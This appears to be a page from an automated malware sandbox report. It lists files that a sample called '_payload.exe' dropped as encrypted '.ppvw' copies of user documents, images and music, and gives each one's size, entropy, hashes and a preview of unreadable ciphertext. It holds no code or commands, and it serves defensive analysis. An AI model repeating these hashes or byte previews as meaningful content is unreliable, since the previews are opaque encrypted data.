                                                                                                                          Preview:HTAGV!v.E-0.)...D.~....RDHB..$.zmE.B..)3........X..v.......3.x...A.X$...&....v...$.....F.......S..{....=UY...x.....X....v..:.n1.j....'..i.>u?b...^.nPc.tP...B....$.P.:.......i..m.|.E..t...#.t!6.n.-.e.[.=...E.SV$l...;2\).....I..*.'.I....g.E2.P. ....f$6...t...^..W....v.[.....G..:.}~.*.-.i.l.8.Y"...........G.F0.P...M....x...N.&A.....h.?..d.h.....[....#!1..U...T....7.....0Ia.h..&H../#..#./.*..7QG..<A.(.....z$....q. .!...U-h.+....s.8.96..XT.rA.{+....@#.`............3..v...B8G..w..m...V{.Bk.....+......c..LI.|.....zo>....;]1............X..s.......V~..k..X.......{}.A..2.X[#.&..S...'.k[V..`[>J..}.I.bH.tl.F.QX..&2......="..lT......f.t..m5B9.#.?...E.e...m..<...q.6P.,..5z.=!.|2..T'.......W=g,......%.o./..j`.Y0.^.Xu..ME.w.....IA...x..yn......?.....a*...q...M..=.M.n.80..UV.D=i..z..E....A'.9.........~..,fd.......)...8;..yjqt.h\]1...`.m....n;].p.dro..m.>g.yf.W.+.r<..y....g......[.f.';df..B2{..$.)...w/..;.a...._p....z5..E.@..|`1.........<..d..n..;j..

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\HTAGVDFUIE.pdf.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.847414800438862
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:RKurG2puQfSYNZNEXYuzl0j6E1+/fVrCxFvKQ3YL28JC9t/EqCe2ClSQErAYOCbD:EIjqY3NEXoj6E1+FruvKQ3Ya8+ZEE2ym
                                                                                                                          MD5:C81D429256795F88A12D220E27CCACA5
                                                                                                                          SHA1:3923970DEDB97E03C741A6F166653DD8A71C6AF2
                                                                                                                          SHA-256:D3CAE8689F041B697B753D088E2398626DE021DFD7DC97D93FDE481B777975FC
                                                                                                                          SHA-512:56A5C3F7E360F31EEE9788B2E14D37CD9E0A44C48ABC3D3E1B38FCA5E7C30E0F19BBB10152562ED6FC70A76A47DBCE81058F955270977F2F262D38B446CCEC57
                                                                                                                          Malicious:false
                                                                                                                          Preview:HTAGV!av.x2...U}....tU'_......~.*=.qH..S/..........(.......2a:j.{..6.......{.k..3..A...!.s...%f..=.b0...(}nj....#75.7.2...b.e\O..h....>..g..,.r..QU...O.0...Ei.W....&....X.......h./.M..G2.......6&.6.X{.H.q..3..E.E9q../..s.v.....e..E..5..].*..v.s.y~?..........c.6.w..|.$c...w..g....'..S,..].C}....1......@.]...&.JQ..z.o....v.Y....t.\.|.bd..U...q..T.(U...O...7.j..s=.W...Y...Co....{.6..y....F.F@,.{ CDh.4...x....P{qG..`....a.......3...onA....%6.0........J...C\..-R..{^;c}G..#.\..@uH.....7SRhp>....".!..x.....Q.tU!.j....D......5.....EZ.......}HD..7........cw9a,.)..Q(..w.+.j..!.0...C.\m...2.<S7f..?..U$....}...%Ct.r..e..eX=.Y.....4..4..k......3(....hxg.@.B>-..,R..:.....N8.Q......TaX$p..w._}...4.j..;...\."n...^..(...r..|.....V.4....K8......P.).M.v.d.Z.b\..?...&......K......>..i...J.........0(...Lc..p..G.9...pB{i.....y........8N...qb...5..lo&)Z.v..^\6.n".,{..\....DEB..o..wd.....d.'.9f|.$..zd....8.uk..tJ...`..S...>..*'..5O..2M....T..R|...y.D[....

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\HTAGVDFUIE.xlsx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.842863417144909
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:HxTs4xfc7CcSMHJuhJiMaR+Av4URWLqp7hDl7IRkQipUfE59PnbD:HxTBc7CcpWS+Ag67hCmhAE5tbD
                                                                                                                          MD5:6D2E50745642BD7FACFBE695D2EC86CC
                                                                                                                          SHA1:8A87C918F10E2E267D902F8139B9AAD0E93D488A
                                                                                                                          SHA-256:69432F01404A035B70A484F03361E526A0A2366E838A240A5C31DBA12C100673
                                                                                                                          SHA-512:947A6283EC64D04854C0D79B2F1A831F44AA58DDBAB52600ADD45CD7334190280474C1808475ECD14B4423FE43CD5AA127CB85C4FC4533AFA2F620B6F6E70A14
                                                                                                                          Malicious:false
                                                                                                                          Preview:HTAGVf.^!..g.....g......xh...z.*...)WG...\?6?~e.... ..G./..(c..).e.3...#.. Ms.....,xS..2...c.p8&j..8`7zz&+.]D..x.4. '...(..o...,5V..uG.....R..*{.{.g..k..\`.T.(v[..b.."..l..z.'o{.-..b/.S..D.x..S...G.qq.Eq?..>..?-K..#......a.j..{-X.u.]...q.!v...3.c.!=....7....Lz..tpt...~..8.Y.......(..........@..v....?.j.,..O7..%r..a....c..J..N..if...9.M..=%...E....s..s.b.g{K....z..u.Jd*..R.a.zt...X.+.......\.L.Z6...?.EX.:.X...#..K5K..Xv..~....H..T.....^..3vI.c..e..:.../I..9..;..]j.oY+.....VM......1..|.......m.X..MN.f.WA.$^..+.{.f..[T.L..>(oo.I.$d...Sa$".<....=.B...........h....>K~l..:.8.?...j...I..._.+...f....&..wE...7...^..oI!9......W.L..Q..s...3.5.]...[x....Z=..2V....iM..JN.2h.hQ2.....@..m._9.3..H.8$I7..../...{"SP.....I.K.{..!.D...^..B..<..<"m..xX.........0.U*.. .G......a"*.T.].....}...\...'..=.5...s.h....U(.....k...rD....U...yV^.....Bu0.$f.U......ky..->0._....G.F..?.)__......~E*Y..?(^~..Z...|......N.Lz.-.a..........'. .F.....d.A^z...kC.......u.&.o".......y

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\IKCRSXYNJM.png.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.844561961686865
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:cML13qm5dXh3WC3kxXvsTnGBX8xWHWVG3wlDt/bD:ca13qelscaXUTGxKpGiD
                                                                                                                          MD5:764B709968C6E0B31160F738738C8A9A
                                                                                                                          SHA1:F6DB0238EADFAC69D56CA610EFFABDDEE995BF5E
                                                                                                                          SHA-256:EE7C8C154C01FC87304E2EDBD6523FE0078862070BCF9D61369A89F3B7EB4D56
                                                                                                                          SHA-512:0989DE198D3FD741CD07D894A918B14A5144E8270F7B4396C3BF742A0D91D5E4E0A27787EAF0CBEE7E1BDDE345F4F39BA9635097F828B9FD206EF1E3C55E9DBC
                                                                                                                          Malicious:false
                                                                                                                          Preview:IKCRS.E....l\..fI.h..~...S...mr.....h..>.=w...9..5..N.(..B.Yo..ET.x..g....`q~`~t<.....RIz..8.s..(k.N....?.yN..iA#.U........%....C..%....S.\y..c.0D.W.i...\..*T......G..<..}..Z..s...O..?.r.....Qer"..j....J....H..."G..[.r........Y.......Bj..^..+...["..W.w...U..e..*F.].<D....R.....[....6..ey"...c:t..m..*.~I....|..T...ut.\._.M.)..M..<j..Y...>..h.I../%.H...<..E.p.,.7........D.,.-.H.Y.q...6....).fF.,..-/d.y.bL.}.~.........4:...ae..c...e.."|.?....J..6:.v.p.&...y..u.>........=a.r+b....+[..xn}..l$...g.a.....hNP...i....h..6.R..}..i........H.v&i/..y..]..#.......]....G..E(..I..C....0x+sX...x.v.2g.?..v.}./..XF.?.v....g....nPWe..(AEB+.d...R.f0U....B]ph..tN.p...pu}.....VHgf.cY....We..m*.M.........!`......P.n.8.,]x..)...<.1#(s|y3`.....C.8...=y.9<...W.Av.2.]7Yc...q.,'.m...)HbU.%R..$.z.[C..[......;>...#..]..k....#.....".:..b....2Ex.J.....Y.=.^.E......p.gn_ b+.hR...|i.m..S'..w.L9}l..5.-..p.T..u.'...S.&.....:........3...'-D&z.W.5s.....B..{A.i..M8Hc.f...Qp..a=

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\IPKGELNTQY.docx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.863667601952109
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:V1TPf7KYjnLi5XqoedgQhAn2+mDOJ9Uskqk9I0GDdG/hRCg0WlGlhrCUdybD:VpO5XqHgQukaUAk9yRG/bCtuu/qD
                                                                                                                          MD5:DC6287C5E36AF21287C7306AE54243E7
                                                                                                                          SHA1:C9F5FAE501F128695FC11B4E874EFE364AD95D7A
                                                                                                                          SHA-256:CB9AB3387B84D48F23CE66CC37F75A59F5923C7E9B87E7DB545D610E3597549C
                                                                                                                          SHA-512:7E823B6976EB8FF16ED8579A44B067B7010DC6A3E44E8EB7A8C6A62F5C0B6F86AD666212352944D61A84C8FD47A15338C20159874A8A5246AC83720C6746005B
                                                                                                                          Malicious:false
                                                                                                                          Preview:IPKGE.'..b.=...=!\w..T.Sr...%.h.....'.....B..C....q%..8...k...:..>t$.=)....!.:G..}u.?..6Q$...........{a..Vr.....8....XDA..K..pp....Im....@......<.^.^..b.......N.'.G.j........{.`.R.%..M.yd.J.le..r..9........./..%...g..5....T.....z")A.ES.*.....~5...&h.f...Zb,....tk...|........".....<O...yu.H.q-......q..S..Q......BS.=[...X.,.HP......N.O.d'.......U..5rQ;..y.q...N......o...'.. E.S....|.Uo.Z....'.#.=9.p..o..lx...t.M...C...;.@..9..OF"x5...Z...k.{..b#......6(.+.......).x.b.Z"..B?....B...3..Qq^..E..}.2.*o...8.._o\.h..v0.\....pt.~....^../.{m1~A...Y..~..Ib.}Q...$..x.*........b....N..O`V%..&U..z7.....$....R...O].U1.>...T.1"6.oWEV.bI.SU.w......d[......q.;......z.1>..-......:.pm.x.j.1(..!Yn...u7...I7.A2nD...W.D...1.g..R....=.jJ...FR.. u...e....hv.?...~d.,l..i..#..~C:........A..~.q.+.H....0r.Xu.y.V...W.....{..E".T....D......]....7...g^.$^JZ..].S...w....l..;7...}A... .d...r.....q=.f<Y.../{=e..n...t.....u.....T{yDC8.>..BJ..zo.l-..}k.m.

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\IPKGELNTQY.pdf.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.8553880300786725
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:PBHmuydVSCkfWFx8fxPIsoVDsGZsWtffsQrj23zW0xTbLd+7aDNttGbD:PxTyd0fWFx8p/oVDsKsWZfhiCgTPd6a2
                                                                                                                          MD5:CB429B2A3A7F440142044929A5916E6C
                                                                                                                          SHA1:833D9837D992F4D96A477B0255C2D983654B3581
                                                                                                                          SHA-256:828FA15530EA13775D6D721C66F0AA1C6A39FACF080FA7C7E6ADF88ACCD4525D
                                                                                                                          SHA-512:7DD6A7A6AC9D77918AFF0F5084FF3EFD1DEC2F49DCC2C697223C85D3162579AAE67DE9E89B91B3DAAC2535837A79ACFAA27298F97510703F24D817103DF0622E
                                                                                                                          Malicious:false
                                                                                                                          Preview:IPKGE........N\.....l.$.M.p...WB:"z..0.,aZV.....6c..,.D...4].2..o.-.e...&.M.....c?9..#...s.Hh.?_[.9.,.R........6:.[.c...(...i9.{!.I..'...S.3.....{.m:.w..l..oI.z....>..v.....0m...T....2^n.._iXF........j...,.V.r.q.$6.\~0..L..7.r...?..J+.8.{.M}...g?.P.J.$.&.z.."..%#....L........w.Z$........9..pQ.j.....t.=...G;.v.u..#.{Z(.!.......;I.n..&2..k.d..!..$....s.F...En..%..Y)t``y.ss/.(.\..:UE....3...|.A.p.H. ...)W...E..cq./T...E/..~.Z...d...-.B.-^....."d2..)j.o..r.:.......6.w..7.......Y.......}.d...d."..c.H..Q..:..|q.a4......s{#.^~.TC.'C7..Z.E....-. .....c..Dq.9}.....kWFY..Tm.....l`..._<..Q...LD@f."5UOP..e.4..).....Y.U.j.....V...,.g..v..a..q..l*..0J&..sB.m&.........!..*..d%..N..]q...e...pX...".....l.Cj.....q!......*......3..}t?.(..;....p..7.bw'vr. ..Z......-..}M..P@W.D+.."..[..sLh.....P...2....R..0.IPe...o.i..(.c.8.....W...>..J...Qw..~.W9..G.c..A..|p....`G .c.......!]0.,..u.i.aMX.....z.$.......$..z..k*i.....x....&df....)...!1%....j.]...s~..7.......~.

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\KATAXZVCPS.png.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.86572388095059
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Y5jMFIxQzDySfdvb/UeBhLvz6c3G/GQdSvXhC19z9H6aXEsn3STlp1bD:YOFEQzDySfb/jv6GQdSvX4tNxXEpRD
                                                                                                                          MD5:0592872A1F2664B26D5D2A6885DABB69
                                                                                                                          SHA1:C0904D42F06D8A7DF5ABEE7DBEF91324B6465EC7
                                                                                                                          SHA-256:4B39158979D829089D0B56A4FC56ABE8AD16BAE264B0942EFED2F66BAE5D2F95
                                                                                                                          SHA-512:B2E6261A36E53F88B658E11C20A1D57FEC9BE1E0B8B9E6A265D503D7848E8DBEEAE6286AC63C68657D041F527CD84570A018E37BC84F09577BF44A360ED72418
                                                                                                                          Malicious:false
                                                                                                                          Preview:KATAX..HPx.m.....y.....#.._.c.....'GZsa6.`..2..7.:...*..d....$..h....-54..j`..~.C.....90.4yJJW\...h3.....J..}.:l.....k..............7...T.D;0,K.T3.....D.\F?J......:..-..I...h.W.+^......aT..b.t.GC;.s...-....F....m.vp.;........ :R.........q.<f.h..;M.=.......\....).3.j....l..g..4.x..E...j..........K.M.V?.P.>.0..f.=...d...S.@.....z......;..B.>......l0J0.%...Y4.o! .Wb!T.P./.#HT.k..69...3.H....N......!..".E...Y.....=......K....j...p...=.q....3|C..2.&Nh....7......F..L..J...b.}.."?.{.c8Y...OV^rM.'j.<........ .].W".n.6W..k.....1.@b....j\..'N...r..H.0........8...^...:...S...1?.b.)..*.t...+ .:.!....RKn..../T.......%...Vs.c6#..;&.y..=.}......S44....@.'.o.....78..D.........T/.nKn....D.i....qB.fV..3....\..A....*.5.I.v.....y.s...%Fd.b+.a.|M z.....h<....,...(.\zs..n.%...%)....AG.....=.er9(}......,G.e$.r2.{.D{..`.E.*M...Q`B[1..U,.VQ....L.N..1....#.>...Ox..5@.sr...S..u.........._q........y...H.....T..mQP54..y.H....D]....Wi.T.....).K...mT.)/S*i...K @F..B!p......

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\KKCTUQOTUB.png.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.875153535374346
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:1Mx4LyLFsNkLEAFqEfHgD3uGN1Xb7L4WycRdg1eeSwtPBzMQqB0bD:1VNkLEAFnPgDeuXbP8IdwOwPzfqeD
                                                                                                                          MD5:681ADF0ECFAC80003E2CDBE69D386A12
                                                                                                                          SHA1:AD80690FABA890362CA96EE6B2AFCA390A205BB9
                                                                                                                          SHA-256:2B41A4AAA3C646FFC2C56B70EF7839A43510414F0096E09C22B05937D798A1D5
                                                                                                                          SHA-512:6EFBE8C8A7BA10750061D927760FA1E62AD6F313B9DB6BA933C48F69C8569F02F0B522A1918CB4EE7E077D0AA054452E83C998D05BAB3FAED8D37C15903365AF
                                                                                                                          Malicious:false
                                                                                                                          Preview:KKCTU...'mtS..9g...~g`.fhv.+..\M..AL.9V..c.!.:....*2.'.....E.....G..Rt.."W......B.p.<.W*..........y.s..036"{)Z....k.....%.N...J.........\[0....$_d{.....uoA...t...%...-|.%..,c?7.......Mg8...ro(d.j.}.......].#!.d.Z...c.>".:C...*...J.4.Q....|G...(..{O...?....,.....Klea..d.{i.ko). ..1...6.=C....?......,v.u.q.E^...-......r|...Kx7.aV:G.b@...*.x...5.......b....m]...r.CR.....~j.Ok.Te....{ .@....T.;lYOk.;...,.`*%n.Y..e..~.Qx&.?5...f .5:....a.".+c...5..*..(e..H6.N.K]8..Rx.....p...q..%o.)...X.M&..V..N.1G(...G.,.....{.qk..*.9...q...Q..q.({..l^....@J.q...._Z.W.{.&.W...., ..X.....B.s......b.R.....i.1...@.s../Rf..`K......&.s..n/y.S2aRnZy.I..Y..wa+y.....D./...*..........e.vB./...... L..[.U!.]...:u.h/#..+`.S...xoz.s.c..s.4U=[.?>..._.......np....S&....[/.ZW...3....<...z*@+>.N.<......7.3.o..9.<..HppjD...........L9...g..lS....h..i.o. ....a...g.....[..IUf..y..]. .:..O.*F..*.:.c2.......b'~a.F.A.F0.`,.I.JS0c.8)...|..z-'..(.......N..;..uMW.........(..?H..

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\KZWFNRXYKI.jpg.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.849779392312825
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:1LlCFE37dJcCIlqO4fyZtlI4UU1xovcbWwUpU+RuDIb+b9HZxdmjbqbD:1xCFEXh2qX6LlFn2Ppn4U2zxkED
                                                                                                                          MD5:CBD6EB5C6FBEFD87FBAA622DFFAE302F
                                                                                                                          SHA1:4BFBB7D08DAAC67848F3871026DCFFA8F1B608D6
                                                                                                                          SHA-256:B3710FA61AE73EA7F74A3AA132FC2DE4AA58014925633615FB2EF5F1CEF167C9
                                                                                                                          SHA-512:ED8D6E532A3D1092EA8FD23AE24C6F18646AF2637A0DC4F33F90C41E603C3A6B9800DB64C24360D6F26F34F96B3A12C8C151D92FB3291BD11DB78A79DB045165
                                                                                                                          Malicious:false
                                                                                                                          Preview:KZWFN)...\S.Y...q.#.../....k...bK_,..$.n.v.g.u.%5.Ne..e.#H.s....#..v]b.....W..#Z..Y.r-..Hi.RX..W..yd.O...[......[...c.D.c....1b......c..*.....h....f.v.:..x b?..A.........EB...J.....^Dh........Q....k....iX..@.`!...q.c..[...J....]..j..|.B...cA .I..&.....@.|.P.?.:.$...}....V..TV.. <.o.g8.;...Wl.T.........f..M.9..J. a..1.w.$;oo..6.-.#b.."..s...&.5...0...P..........Q_.{.]..(.r...$........z.P./$.QO.L..].Y.b../.....K...N..w...&.E....}a.!M.$t36.Cfh^.._~L..~.w.D.B./...*.h^.i....[f>.x..).;...x..#.]W...g.3.....3R[.......9.E@S.../N.E.....D.ma7K..$!..v...R...q..}.....R....EgU<r*&....j...M'?......U.#.%.,..H..z.~#..H.e.y.{.t..y...v..?...!..3_..z.m..[I....V+{..x..bibl7..6M.&e.OFc.l.T...6..c.....F.a.&q.rG..0...]............C....=...:..y....pHa=......1.^..M..>N2....C~...4i.\...ZK.i[qrqs..$..bF...~.Q..-.>....I.M.yw./.~.]........N....k..|.t.......0.x}.<..r.}....n..)+.'.N...wu..w/............K.R.2D...4.......{.;.e...+.S.q.y...........a{..x.....5...,.O

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\KZWFNRXYKI.mp3.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.882117641810439
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:CB4X7kiLTQF3DraWt4PAH7RBvRx3wOBRrCNAcHaJFSF5z4bkb+bD:CGkuMF3cAVBHJumIsbkb8D
                                                                                                                          MD5:CE26981EC83A71DBBCCB369A38ECA5BC
                                                                                                                          SHA1:5FE9FDB9DA54B05383C8EBED4599033B3E43AC02
                                                                                                                          SHA-256:A6226F4EFE376F5BAC84038DACBCB3D6DDFFC786B4719D05D60BBE418F84F1A4
                                                                                                                          SHA-512:D2F0540BAF5B34318FE6A350CD03C5C45BCFD753749F002D9182B97F70ECE94A682B8C6B9E6BC2035B757815019A833972E9AAFBEA3EE6C13CF317FE34CE447B
                                                                                                                          Malicious:false
                                                                                                                          Preview:KZWFN.v.......g..J.....?...`...rks..+:7.....@...^..D.F.p..~....&.H..;$).........)6n>6O.;..._.(.8d..b.s...in..m1?........m.%/\......NXX,...AX(......Ug...7*0@lY:..r.*."%.cH..."JsUHz...}.e<..........X.Y..8......@1v...9=.......z..2^$9v.(.O.I.....g#..T.<...z..E.gqc.%.N;*...#.7.J-.......+.2..(.E.8K.S{!...]S..&)...,.8.)......'..E....7g.......f.G.L..5......w...BE't&.E.....Z....v>..x.Pzl.i....Y..<f.p.w. ...?%.dE.e.,...!.....9...$n..k1.L.YT}..:.....ny.......u@n.B./zp...C.(..|1..../{...U..R..\T.*...*.D.*<..-H.......l....}y:.....G....|...t...__7O..yo......''K.q.&.@E..=..y.E.uhv....m..P.q..s.=..*..B.!T\.sUj.Xp.q..6.M...PU8j...M..."Oz.\.X.D.~.Z....>.!..!..O.a.....;?.9......`.{...ZOE..d!.z5.%..=...^.@v.....G....._v....o..*hg........g..7.O'..]....R....x._.^[..$..q...7'...=v:..s..`.....~..0.ngy.9.n......w.Mf....f/....o.oP...o...#.o...N[H....L.k...G......."8X....(z........9.y`..T.E...x....#..B.].....pG.#../ .....bW...n.V!.z..un...A.....3.....qw.a.

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\KZWFNRXYKI.pdf.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.830154758434434
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:XYsbV/T9wL/Kqg6LXgQd5Sn53ry7aZMEsiFxKyMPM4tqXRfXbD:Xx25xNd5A3memE1xGPg1D
                                                                                                                          MD5:F7567084B174557765A82C06CB59C4CA
                                                                                                                          SHA1:B37A15559F097C594522BBA6EEE0F08C173A609D
                                                                                                                          SHA-256:F1139F27842BFF39AABBC5F80BC5264C72A627368B155B1CE9E885FBA23FDE60
                                                                                                                          SHA-512:B046892CAF91A3932544D7B3AE218951D24A13726D3596A79AA2C24BFFAC1A597B2179C4BAEA217387C14F4859887F2A4B0DF9E1CE2DD53DBC41231615DAE433
                                                                                                                          Malicious:false
                                                                                                                          Preview:KZWFN.h.....8..Y.^.D..Cw...3.E...n.;.TGj..<.V....n|.;.)xsaxt.1..8..n.$k>z0.m...GC.5.q....0..c.1.0n..f...m.Bt...G...25....U_.hM..>\^..:.N*d......L>9XA.M.v.!..$....%.... ....Gy........-\.!....6.=.h".$...Gx..b.9.\A:....(H.bb...........4...Bmj.%/...P.}......KC7.=C....1d<.Z.n.....Er......}.!.*.c&r..j..Ny....G.>t.9....s.~.Xd.........=..P....=...W.....H<. .,....\..{k.W...T..We...f...K..`.VS5....u.......+...D..............t....;.b-..L..9......$9W....e..[F[.....o.}.o..cW...1.>p.........w|. ....4w(B...C...?.7.(....[4udd..}.p.^g.f..\*..*...Hh5.V.....,Np....H-..%...yN..%.M..4..q...fCV..+..^.e....N..b|L.EbN.o./.A.@.....n.t.k&....5.......a......q.-....s..A<....A........gBi!.3..O...i.i{0.,.[......ON.s)>F..._4J..w..8....D..q.;FR....?h....E.T?..?.........BC&..n.Q...xr.f.....x....O.....Vk.....k6".Xo.K.>G./.-..|.2.O.....e..H.2......i3..<.,...1$...."....'.6.3.."cW..E.rn.'.*.[.Zh.XVT..(.2.....(!k.>.6s.8..x...C.kbf.W0.."i...jA...S9..L\.).....7...Y...U.p

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\LTKMYBSEYZ.jpg.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.856161452846947
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:zYchZ64FsKOQ9sS/XlNi3BMZL2xDNDNRFg2RpKeBpMxxzHJQfifhC3zpD1LgbD:/rs839Ni3BMZEVFg2RpPBpwVY8hozppS
                                                                                                                          MD5:54D8B17B3D56749D44CD0A763B03EFE8
                                                                                                                          SHA1:14B36D7197230ABCD8FAED4C20560D1AE5BF8C67
                                                                                                                          SHA-256:EDB2A33D00B6F2966A61107DD842A617B915225277E0E951FB11F05A29672E89
                                                                                                                          SHA-512:4AE0B78105DDB6FFE90B12D86BB8A2ED6FA66A06AD87E84B9801BE17BA6CC9F0637C9AF4D7B3E5CF46835EFF3A013CD81E0DEE55007935BE746B6334E80C5467
                                                                                                                          Malicious:false
                                                                                                                          Preview:LTKMY..d.f.Q.....Tcm.S"....-..L&.C.(.8.L7k.Zg....7t.m..U....9.WC.3-.....3.......hL.D....`.|.2dC.F....T...V.........uQ\.[.m.......UQdI2m...e.Y...!..G&.....n.V.O`...,...j.sw}.....SV..WO...A....VM.R.=...y..aE...T:}.......{.`...3.+.....p.9.[8.d.z..BKX....7..X...{=.9.~...C=..)N..*M...H....?#V,rK.S.'m.O[S%8.F...$..*.+X..*.s..>.m...p...3.~..n'D.Pnw.W+.....l....,.Y.b\K....MF/..v&D.....U).v;_.$..?..K.z.k4.i.Ml.....W18..&.J...Z..Ia*\II.....l.(.i}......w$...t91..v...V.H....7..4Cd.Si.LJH.M_.Am..H*..N.s?.Af.........--\.....g..`R...+...f.7r.......if..6...eTz...e...!.i...s...u.x....w..g.....'.....{........r$......x.}.Q9`PL.6[..Li!3_.-..k...'..:(..}..1@........C.GV...@.0BNh..k\.....&.l.c<.."<...8.l7Z......x...u.Gb..f4/G.......*i....Y|..ng......5....2..y.U...>.....h....^.h.D.....i....[.t|#.).....)KV.ip..2.Bt.k....Q..h.7mT..S..:......p.7.....O..^........m.-.TwA...SPL{....Kk5=..,.....\.....d,B..z.:.-.b..djQ....M.Q.{.|t5q.e.V._.i.J......j.Y.i..z.Z...uW..H_.

                                                                                                                          C:\Users\user\Application Data\Microsoft\Windows\Recent\LTKMYBSEYZ.xlsx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.850526795784183
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:+Lu7pl4kn9P6QnWAwdBq9SLMZks9KuPU8oBxrAW5jSTbDYMrbD:H7pBXnQBq9yShM/rAWxSLtD
                                                                                                                          MD5:F8F20B94B5E77C2270D24EB81701E766
                                                                                                                          SHA1:75A54FA176CD92A438F3ABF251214CD53B962A04
                                                                                                                          SHA-256:AE3839FDC6F98840516A7220574C26786A7C568664BF796B7DE013B8B40DC4F3
                                                                                                                          SHA-512:B0FF69D5D71CF9DAA9D9D5EDA5C677EB7E6464C362340E84148F33F913393CB6461AD50AAD4C9D7D811ECB5650960344F1687FF17B1734EAA0A33589902E6F14
                                                                                                                          Malicious:false
